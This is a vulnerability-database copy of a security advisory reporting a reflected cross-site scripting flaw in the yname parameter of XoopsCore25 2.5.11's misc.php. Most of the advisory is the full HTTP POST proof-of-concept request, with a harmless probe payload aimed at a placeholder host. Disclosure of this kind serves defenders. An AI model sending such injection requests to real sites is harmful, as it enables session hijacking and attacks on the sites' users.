Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:177106
HistoryFeb 13, 2024 - 12:00 a.m.

XoopsCore25 2.5.11 Cross Site Scripting

2024-02-1300:00:00
nu11secur1ty
packetstormsecurity.com
157
xoopscore25-2.5.11
cross site scripting
yname parameter
html tag
vendor
github
nu11secur1ty
portswigger
pwnedhost
vulnerability
malicious url
exploit

7.4 High

AI Score

Confidence

Low

JSON
`## Title: XoopsCore25-2.5.11-XSS-Reflected  
## Author: nu11secur1ty  
## Date: 02/12/2024  
## Vendor: https://xoops.org/  
## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11  
## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected  
  
## Description:  
The value of the yname request parameter is copied into the value of  
an HTML tag attribute which is encapsulated in single quotation marks.  
The payload '>333< was submitted in the yname parameter. This input  
was echoed unmodified in the application's response. The attacker can  
trick the user to visit very dangerous and malicious URL in this  
session  
  
STATUS: HIGH Vulnerability  
  
[+]Exploit execution:  
```POST  
POST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate, br  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmn  
Origin: https://pwnedhost.com  
Upgrade-Insecure-Requests: 1  
Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563  
Content-Type: application/x-www-form-urlencoded  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
Content-Length: 148  
  
yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend  
```  
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html)  
  
## Time spent:  
01:17:00  
  
  
`

7.4 High

AI Score

Confidence

Low

JSON